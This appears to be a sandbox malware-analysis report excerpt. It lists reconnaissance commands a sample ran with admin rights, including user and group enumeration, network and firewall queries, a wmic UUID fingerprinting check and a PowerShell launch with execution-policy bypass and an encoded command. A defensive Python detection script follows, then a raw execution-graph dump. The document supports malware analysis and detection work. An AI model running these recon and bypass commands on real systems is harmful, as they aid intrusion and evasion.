Path:C:\Windows\System32\net1.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\net1 localgroup
Imagebase:0x7ff6cb310000
File size:183'808 bytes
MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:60
Start time:03:20:19
Start date:28/10/2024
Path:C:\Windows\System32\net.exe
Wow64 process (32bit):false
Commandline:net localgroup administrators
Imagebase:0x7ff7403e0000
File size:59'904 bytes
MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:61
Start time:03:20:19
Start date:28/10/2024
Path:C:\Windows\System32\net1.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\net1 localgroup administrators
Imagebase:0x7ff6cb310000
File size:183'808 bytes
MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:62
Start time:03:20:19
Start date:28/10/2024
Path:C:\Windows\System32\net.exe
Wow64 process (32bit):false
Commandline:net user guest
Imagebase:0x7ff6c8ac0000
File size:59'904 bytes
MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:63
Start time:03:20:19
Start date:28/10/2024
Path:C:\Windows\System32\net1.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\net1 user guest
Imagebase:0x7ff6cb310000
File size:183'808 bytes
MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:64
Start time:03:20:19
Start date:28/10/2024
Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:net user administrator
                                                                                                                                                                                                                                  Imagebase:0xd90000
                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:65
                                                                                                                                                                                                                                  Start time:03:20:19
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\net1 user administrator
                                                                                                                                                                                                                                  Imagebase:0x7ff6cb310000
                                                                                                                                                                                                                                  File size:183'808 bytes
                                                                                                                                                                                                                                  MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:66
                                                                                                                                                                                                                                  Start time:03:20:19
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:wmic startup get caption,command
                                                                                                                                                                                                                                  Imagebase:0x7ff73e070000
                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:67
                                                                                                                                                                                                                                  Start time:03:20:20
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:tasklist /svc
                                                                                                                                                                                                                                  Imagebase:0x7ff792ef0000
                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:68
                                                                                                                                                                                                                                  Start time:03:20:21
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:ipconfig /all
                                                                                                                                                                                                                                  Imagebase:0x7ff632460000
                                                                                                                                                                                                                                  File size:35'840 bytes
                                                                                                                                                                                                                                  MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:69
                                                                                                                                                                                                                                  Start time:03:20:21
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\ROUTE.EXE
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:route print
                                                                                                                                                                                                                                  Imagebase:0x7ff63b5f0000
                                                                                                                                                                                                                                  File size:24'576 bytes
                                                                                                                                                                                                                                  MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:70
                                                                                                                                                                                                                                  Start time:03:20:21
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\ARP.EXE
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:arp -a
                                                                                                                                                                                                                                  Imagebase:0x7ff67ae40000
                                                                                                                                                                                                                                  File size:26'624 bytes
                                                                                                                                                                                                                                  MD5 hash:2AF1B2C042B83437A4BE82B19749FA98
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:71
                                                                                                                                                                                                                                  Start time:03:20:21
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\NETSTAT.EXE
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:netstat -ano
                                                                                                                                                                                                                                  Imagebase:0x7ff790100000
                                                                                                                                                                                                                                  File size:39'936 bytes
                                                                                                                                                                                                                                  MD5 hash:7FDDD6681EA81CE26E64452336F479E6
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:72
                                                                                                                                                                                                                                  Start time:03:20:21
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:sc query type= service state= all
                                                                                                                                                                                                                                  Imagebase:0x7ff706650000
                                                                                                                                                                                                                                  File size:72'192 bytes
                                                                                                                                                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

Target ID:73
Start time:03:20:21
Start date:28/10/2024
Path:C:\Windows\System32\netsh.exe
Wow64 process (32bit):false
Commandline:netsh firewall show state
Imagebase:0x7ff6d3e40000
File size:96'768 bytes
MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:74
Start time:03:20:21
Start date:28/10/2024
Path:C:\Windows\System32\netsh.exe
Wow64 process (32bit):false
Commandline:netsh firewall show config
Imagebase:0x7ff6d3e40000
File size:96'768 bytes
MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:75
Start time:03:20:22
Start date:28/10/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:0x7ff73cdb0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:76
Start time:03:20:22
Start date:28/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:77
Start time:03:20:22
Start date:28/10/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic csproduct get uuid
Imagebase:0x7ff73e070000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:79
Start time:03:20:23
Start date:28/10/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
Imagebase:0x7ff73cdb0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:80
Start time:03:20:23
Start date:28/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:81
Start time:03:20:23
Start date:28/10/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Imagebase:0x7ff6e3d50000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true
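The process entries above show the three recon and evasion patterns an analyst would want to alert on from this tree: netsh reading firewall state, wmic querying the machine UUID (a common virtual-machine fingerprinting step), and cmd.exe spawning powershell.exe with -ExecutionPolicy Bypass and a base64 -EncodedCommand. As an added example that is not part of the Joe Sandbox report, the Python below runs a small rule set over constructed process records shaped like those entries and decodes the -EncodedCommand argument the way PowerShell does (base64 of UTF-16LE). The encoded payload in the constructed record is a benign string built inline, because the report redacts the sample's real one; the rule names and record fields are assumptions made for this example.

```python
import base64
import re

# Constructed -EncodedCommand payload (benign), built the way PowerShell expects:
# base64 over the UTF-16LE encoding of the script text. This is NOT the sample's payload.
ENCODED = base64.b64encode("Write-Output 'constructed'".encode("utf-16-le")).decode("ascii")

# Constructed process records mirroring the shape of the report's process list.
PROCESSES = [
    {"id": 73, "path": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh firewall show state"},
    {"id": 74, "path": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh firewall show config"},
    {"id": 75, "path": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'C:\\Windows\\system32\\cmd.exe /c "wmic csproduct get uuid"'},
    {"id": 76, "path": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"id": 77, "path": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic csproduct get uuid"},
    {"id": 81, "path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand {ENCODED}"},
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; the common
# abbreviations are listed longest-first so the alternation does not stop early.
ENC_ARG = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)

# (rule name, pattern) pairs; names are assumptions for this example.
RULES = [
    ("firewall_recon",      re.compile(r"\bnetsh\b.*\bfirewall\b.*\bshow\b", re.IGNORECASE)),
    ("hardware_uuid_query", re.compile(r"\bwmic\b.*\bcsproduct\b.*\buuid\b", re.IGNORECASE)),
    ("execpolicy_bypass",   re.compile(r"-executionpolicy\s+bypass\b", re.IGNORECASE)),
    ("encoded_powershell",  ENC_ARG),
]


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if absent or malformed."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # Not valid base64/UTF-16LE: treat as no decodable command rather than crashing the scan.
        return None


def classify(proc):
    """Return the list of rule names whose pattern matches this process's command line."""
    return [name for name, pattern in RULES if pattern.search(proc["cmdline"])]


def scan(processes):
    """Map target id -> matched rule names for every process that hit at least one rule."""
    hits = {}
    for proc in processes:
        tags = classify(proc)
        if tags:
            hits[proc["id"]] = tags
    return hits


if __name__ == "__main__":
    for target_id, tags in sorted(scan(PROCESSES).items()):
        print(target_id, tags)
    print(decode_encoded_command(PROCESSES[-1]["cmdline"]))
```

The encoded-command decode is the step worth keeping in any triage script: the base64 blob in the process tree is opaque, but once decoded as UTF-16LE it is ordinary PowerShell that can be read and searched like any other command line.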


Execution Graph

Execution Coverage:10.3%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:20.1%
Total number of Nodes:2000
Total number of Limit Nodes:27
execution_graph: node and edge listing behind the interactive execution-graph viewer (function addresses, per-node API call counts and imported API names such as GetModuleHandleW, GetModuleHandleExW, GetProcAddress, FreeLibrary, EnterCriticalSection/LeaveCriticalSection, CreateFileW, GetFileType, GetFileInformationByHandle, PeekNamedPipe, GetDriveTypeW, FlsGetValue/FlsSetValue, HeapAlloc/RtlFreeHeap, IsDebuggerPresent, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind and TerminateProcess); the raw dump, which is truncated at the end of the page, is not reproduced here.
51 API calls 19475->19476 19477 7ff7b2b75aa6 19476->19477 19477->19470 19478 7ff7b2b7f724 51 API calls 19477->19478 19478->19470 19480 7ff7b2b75b1a 19479->19480 19481 7ff7b2b75b51 19480->19481 19482 7ff7b2b75b2a 19480->19482 19483 7ff7b2b7f5b8 21 API calls 19481->19483 19484 7ff7b2b74e7c _fread_nolock 11 API calls 19482->19484 19485 7ff7b2b75b3a 19482->19485 19483->19485 19484->19485 19485->19421 19487 7ff7b2b7594d FileTimeToSystemTime 19486->19487 19488 7ff7b2b75940 19486->19488 19489 7ff7b2b75961 SystemTimeToTzSpecificLocalTime 19487->19489 19490 7ff7b2b75948 19487->19490 19488->19487 19488->19490 19489->19490 19491 7ff7b2b6c550 _log10_special 8 API calls 19490->19491 19492 7ff7b2b75839 19491->19492 19492->19443 19494 7ff7b2b7f755 19493->19494 19495 7ff7b2b7f731 19493->19495 19497 7ff7b2b7f78f 19494->19497 19500 7ff7b2b7f7ae 19494->19500 19495->19494 19496 7ff7b2b7f736 19495->19496 19498 7ff7b2b74f08 _get_daylight 11 API calls 19496->19498 19499 7ff7b2b74f08 _get_daylight 11 API calls 19497->19499 19501 7ff7b2b7f73b 19498->19501 19503 7ff7b2b7f794 19499->19503 19504 7ff7b2b74f4c 45 API calls 19500->19504 19502 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 19501->19502 19505 7ff7b2b7f746 19502->19505 19506 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 19503->19506 19507 7ff7b2b7f7bb 19504->19507 19505->19473 19508 7ff7b2b7f79f 19506->19508 19507->19508 19509 7ff7b2b804dc 51 API calls 19507->19509 19508->19473 19509->19507 20079 7ff7b2b816b0 20090 7ff7b2b873e4 20079->20090 20092 7ff7b2b873f1 20090->20092 20091 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20091->20092 20092->20091 20093 7ff7b2b8740d 20092->20093 20094 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20093->20094 20095 7ff7b2b816b9 20093->20095 20094->20093 20096 7ff7b2b802d8 EnterCriticalSection 20095->20096 16083 7ff7b2b6cc3c 16104 7ff7b2b6ce0c 16083->16104 16086 7ff7b2b6cd88 16258 7ff7b2b6d12c IsProcessorFeaturePresent 
16086->16258 16087 7ff7b2b6cc58 __scrt_acquire_startup_lock 16089 7ff7b2b6cd92 16087->16089 16094 7ff7b2b6cc76 __scrt_release_startup_lock 16087->16094 16090 7ff7b2b6d12c 7 API calls 16089->16090 16092 7ff7b2b6cd9d __CxxCallCatchBlock 16090->16092 16091 7ff7b2b6cc9b 16093 7ff7b2b6cd21 16110 7ff7b2b6d274 16093->16110 16094->16091 16094->16093 16247 7ff7b2b79b2c 16094->16247 16096 7ff7b2b6cd26 16113 7ff7b2b61000 16096->16113 16101 7ff7b2b6cd49 16101->16092 16254 7ff7b2b6cf90 16101->16254 16105 7ff7b2b6ce14 16104->16105 16106 7ff7b2b6ce20 __scrt_dllmain_crt_thread_attach 16105->16106 16107 7ff7b2b6ce2d 16106->16107 16109 7ff7b2b6cc50 16106->16109 16107->16109 16265 7ff7b2b6d888 16107->16265 16109->16086 16109->16087 16292 7ff7b2b8a4d0 16110->16292 16112 7ff7b2b6d28b GetStartupInfoW 16112->16096 16114 7ff7b2b61009 16113->16114 16294 7ff7b2b75484 16114->16294 16116 7ff7b2b637fb 16301 7ff7b2b636b0 16116->16301 16121 7ff7b2b6c550 _log10_special 8 API calls 16124 7ff7b2b63ca7 16121->16124 16122 7ff7b2b6383c 16468 7ff7b2b61c80 16122->16468 16123 7ff7b2b6391b 16477 7ff7b2b645c0 16123->16477 16252 7ff7b2b6d2b8 GetModuleHandleW 16124->16252 16127 7ff7b2b6385b 16373 7ff7b2b68830 16127->16373 16130 7ff7b2b6396a 16500 7ff7b2b62710 16130->16500 16132 7ff7b2b6388e 16140 7ff7b2b638bb __std_exception_copy 16132->16140 16472 7ff7b2b689a0 16132->16472 16134 7ff7b2b6395d 16135 7ff7b2b63984 16134->16135 16136 7ff7b2b63962 16134->16136 16138 7ff7b2b61c80 49 API calls 16135->16138 16496 7ff7b2b7004c 16136->16496 16141 7ff7b2b639a3 16138->16141 16142 7ff7b2b68830 14 API calls 16140->16142 16149 7ff7b2b638de __std_exception_copy 16140->16149 16146 7ff7b2b61950 115 API calls 16141->16146 16142->16149 16143 7ff7b2b68940 40 API calls 16144 7ff7b2b63a0b 16143->16144 16145 7ff7b2b689a0 40 API calls 16144->16145 16147 7ff7b2b63a17 16145->16147 16148 7ff7b2b639ce 16146->16148 16150 7ff7b2b689a0 40 API calls 16147->16150 16148->16127 16151 7ff7b2b639de 16148->16151 16149->16143 16155 7ff7b2b6390e 
__std_exception_copy 16149->16155 16152 7ff7b2b63a23 16150->16152 16153 7ff7b2b62710 54 API calls 16151->16153 16154 7ff7b2b689a0 40 API calls 16152->16154 16161 7ff7b2b63808 __std_exception_copy 16153->16161 16154->16155 16156 7ff7b2b68830 14 API calls 16155->16156 16157 7ff7b2b63a3b 16156->16157 16158 7ff7b2b63b2f 16157->16158 16159 7ff7b2b63a60 __std_exception_copy 16157->16159 16160 7ff7b2b62710 54 API calls 16158->16160 16173 7ff7b2b63aab 16159->16173 16386 7ff7b2b68940 16159->16386 16160->16161 16161->16121 16163 7ff7b2b68830 14 API calls 16164 7ff7b2b63bf4 __std_exception_copy 16163->16164 16165 7ff7b2b63c46 16164->16165 16166 7ff7b2b63d41 16164->16166 16167 7ff7b2b63cd4 16165->16167 16168 7ff7b2b63c50 16165->16168 16511 7ff7b2b644e0 16166->16511 16171 7ff7b2b68830 14 API calls 16167->16171 16393 7ff7b2b690e0 16168->16393 16175 7ff7b2b63ce0 16171->16175 16172 7ff7b2b63d4f 16176 7ff7b2b63d65 16172->16176 16177 7ff7b2b63d71 16172->16177 16173->16163 16178 7ff7b2b63c61 16175->16178 16181 7ff7b2b63ced 16175->16181 16514 7ff7b2b64630 16176->16514 16180 7ff7b2b61c80 49 API calls 16177->16180 16183 7ff7b2b62710 54 API calls 16178->16183 16190 7ff7b2b63cc8 __std_exception_copy 16180->16190 16184 7ff7b2b61c80 49 API calls 16181->16184 16183->16161 16187 7ff7b2b63d0b 16184->16187 16185 7ff7b2b63dc4 16443 7ff7b2b69390 16185->16443 16187->16190 16191 7ff7b2b63d12 16187->16191 16189 7ff7b2b63dd7 SetDllDirectoryW 16195 7ff7b2b63e0a 16189->16195 16237 7ff7b2b63e5a 16189->16237 16190->16185 16192 7ff7b2b63da7 SetDllDirectoryW LoadLibraryExW 16190->16192 16194 7ff7b2b62710 54 API calls 16191->16194 16192->16185 16194->16161 16196 7ff7b2b68830 14 API calls 16195->16196 16201 7ff7b2b63e16 __std_exception_copy 16196->16201 16197 7ff7b2b64008 16199 7ff7b2b64035 16197->16199 16200 7ff7b2b64012 PostMessageW GetMessageW 16197->16200 16198 7ff7b2b63f1b 16448 7ff7b2b633c0 16198->16448 16591 7ff7b2b63360 16199->16591 16200->16199 16207 7ff7b2b63ef2 16201->16207 16211 7ff7b2b63e4e 
16201->16211 16210 7ff7b2b68940 40 API calls 16207->16210 16210->16237 16211->16237 16517 7ff7b2b66dc0 16211->16517 16237->16197 16237->16198 16248 7ff7b2b79b64 16247->16248 16249 7ff7b2b79b43 16247->16249 18710 7ff7b2b7a3d8 16248->18710 16249->16093 16253 7ff7b2b6d2c9 16252->16253 16253->16101 16255 7ff7b2b6cfa1 16254->16255 16256 7ff7b2b6cd60 16255->16256 16257 7ff7b2b6d888 7 API calls 16255->16257 16256->16091 16257->16256 16259 7ff7b2b6d152 _isindst __scrt_get_show_window_mode 16258->16259 16260 7ff7b2b6d171 RtlCaptureContext RtlLookupFunctionEntry 16259->16260 16261 7ff7b2b6d19a RtlVirtualUnwind 16260->16261 16262 7ff7b2b6d1d6 __scrt_get_show_window_mode 16260->16262 16261->16262 16263 7ff7b2b6d208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16262->16263 16264 7ff7b2b6d256 _isindst 16263->16264 16264->16089 16266 7ff7b2b6d89a 16265->16266 16267 7ff7b2b6d890 16265->16267 16266->16109 16271 7ff7b2b6dc24 16267->16271 16272 7ff7b2b6dc33 16271->16272 16273 7ff7b2b6d895 16271->16273 16279 7ff7b2b6de60 16272->16279 16275 7ff7b2b6dc90 16273->16275 16276 7ff7b2b6dcbb 16275->16276 16277 7ff7b2b6dc9e DeleteCriticalSection 16276->16277 16278 7ff7b2b6dcbf 16276->16278 16277->16276 16278->16266 16283 7ff7b2b6dcc8 16279->16283 16284 7ff7b2b6dd0c __vcrt_FlsAlloc 16283->16284 16285 7ff7b2b6ddb2 TlsFree 16283->16285 16284->16285 16286 7ff7b2b6dd3a LoadLibraryExW 16284->16286 16287 7ff7b2b6ddf9 GetProcAddress 16284->16287 16291 7ff7b2b6dd7d LoadLibraryExW 16284->16291 16288 7ff7b2b6dd5b GetLastError 16286->16288 16289 7ff7b2b6ddd9 16286->16289 16287->16285 16288->16284 16289->16287 16290 7ff7b2b6ddf0 FreeLibrary 16289->16290 16290->16287 16291->16284 16291->16289 16293 7ff7b2b8a4c0 16292->16293 16293->16112 16293->16293 16297 7ff7b2b7f480 16294->16297 16295 7ff7b2b7f4d3 16296 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16295->16296 16300 7ff7b2b7f4fc 16296->16300 16297->16295 16298 7ff7b2b7f526 16297->16298 16604 7ff7b2b7f358 16298->16604 
16300->16116 16612 7ff7b2b6c850 16301->16612 16304 7ff7b2b636eb GetLastError 16619 7ff7b2b62c50 16304->16619 16305 7ff7b2b63710 16614 7ff7b2b69280 FindFirstFileExW 16305->16614 16308 7ff7b2b63706 16313 7ff7b2b6c550 _log10_special 8 API calls 16308->16313 16310 7ff7b2b6377d 16645 7ff7b2b69440 16310->16645 16311 7ff7b2b63723 16634 7ff7b2b69300 CreateFileW 16311->16634 16316 7ff7b2b637b5 16313->16316 16315 7ff7b2b6378b 16315->16308 16320 7ff7b2b62810 49 API calls 16315->16320 16316->16161 16323 7ff7b2b61950 16316->16323 16318 7ff7b2b6374c __vcrt_FlsAlloc 16318->16310 16319 7ff7b2b63734 16637 7ff7b2b62810 16319->16637 16320->16308 16324 7ff7b2b645c0 108 API calls 16323->16324 16325 7ff7b2b61985 16324->16325 16326 7ff7b2b61c43 16325->16326 16327 7ff7b2b67f90 83 API calls 16325->16327 16328 7ff7b2b6c550 _log10_special 8 API calls 16326->16328 16329 7ff7b2b619cb 16327->16329 16330 7ff7b2b61c5e 16328->16330 16372 7ff7b2b61a03 16329->16372 17047 7ff7b2b706d4 16329->17047 16330->16122 16330->16123 16332 7ff7b2b7004c 74 API calls 16332->16326 16333 7ff7b2b619e5 16334 7ff7b2b61a08 16333->16334 16335 7ff7b2b619e9 16333->16335 17051 7ff7b2b7039c 16334->17051 16336 7ff7b2b74f08 _get_daylight 11 API calls 16335->16336 16338 7ff7b2b619ee 16336->16338 17054 7ff7b2b62910 16338->17054 16341 7ff7b2b61a26 16343 7ff7b2b74f08 _get_daylight 11 API calls 16341->16343 16342 7ff7b2b61a45 16346 7ff7b2b61a5c 16342->16346 16347 7ff7b2b61a7b 16342->16347 16344 7ff7b2b61a2b 16343->16344 16345 7ff7b2b62910 54 API calls 16344->16345 16345->16372 16348 7ff7b2b74f08 _get_daylight 11 API calls 16346->16348 16349 7ff7b2b61c80 49 API calls 16347->16349 16350 7ff7b2b61a61 16348->16350 16351 7ff7b2b61a92 16349->16351 16352 7ff7b2b62910 54 API calls 16350->16352 16353 7ff7b2b61c80 49 API calls 16351->16353 16352->16372 16354 7ff7b2b61add 16353->16354 16355 7ff7b2b706d4 73 API calls 16354->16355 16356 7ff7b2b61b01 16355->16356 16357 7ff7b2b61b16 16356->16357 16358 7ff7b2b61b35 16356->16358 16359 7ff7b2b74f08 
_get_daylight 11 API calls 16357->16359 16360 7ff7b2b7039c _fread_nolock 53 API calls 16358->16360 16361 7ff7b2b61b1b 16359->16361 16362 7ff7b2b61b4a 16360->16362 16363 7ff7b2b62910 54 API calls 16361->16363 16364 7ff7b2b61b50 16362->16364 16365 7ff7b2b61b6f 16362->16365 16363->16372 16367 7ff7b2b74f08 _get_daylight 11 API calls 16364->16367 17069 7ff7b2b70110 16365->17069 16369 7ff7b2b61b55 16367->16369 16370 7ff7b2b62910 54 API calls 16369->16370 16370->16372 16371 7ff7b2b62710 54 API calls 16371->16372 16372->16332 16374 7ff7b2b6883a 16373->16374 16375 7ff7b2b69390 2 API calls 16374->16375 16376 7ff7b2b68859 GetEnvironmentVariableW 16375->16376 16377 7ff7b2b68876 ExpandEnvironmentStringsW 16376->16377 16378 7ff7b2b688c2 16376->16378 16377->16378 16379 7ff7b2b68898 16377->16379 16380 7ff7b2b6c550 _log10_special 8 API calls 16378->16380 16381 7ff7b2b69440 2 API calls 16379->16381 16382 7ff7b2b688d4 16380->16382 16383 7ff7b2b688aa 16381->16383 16382->16132 16384 7ff7b2b6c550 _log10_special 8 API calls 16383->16384 16385 7ff7b2b688ba 16384->16385 16385->16132 16387 7ff7b2b69390 2 API calls 16386->16387 16388 7ff7b2b6895c 16387->16388 16389 7ff7b2b69390 2 API calls 16388->16389 16390 7ff7b2b6896c 16389->16390 17287 7ff7b2b78238 16390->17287 16392 7ff7b2b6897a __std_exception_copy 16392->16173 16394 7ff7b2b690f5 16393->16394 17305 7ff7b2b68570 GetCurrentProcess OpenProcessToken 16394->17305 16397 7ff7b2b68570 7 API calls 16398 7ff7b2b69121 16397->16398 16399 7ff7b2b6913a 16398->16399 16400 7ff7b2b69154 16398->16400 16401 7ff7b2b626b0 48 API calls 16399->16401 16402 7ff7b2b626b0 48 API calls 16400->16402 16403 7ff7b2b69152 16401->16403 16404 7ff7b2b69167 LocalFree LocalFree 16402->16404 16403->16404 16405 7ff7b2b69183 16404->16405 16408 7ff7b2b6918f 16404->16408 17315 7ff7b2b62b50 16405->17315 16407 7ff7b2b6c550 _log10_special 8 API calls 16409 7ff7b2b63c55 16407->16409 16408->16407 16409->16178 16410 7ff7b2b68660 16409->16410 16411 7ff7b2b68678 16410->16411 16412 
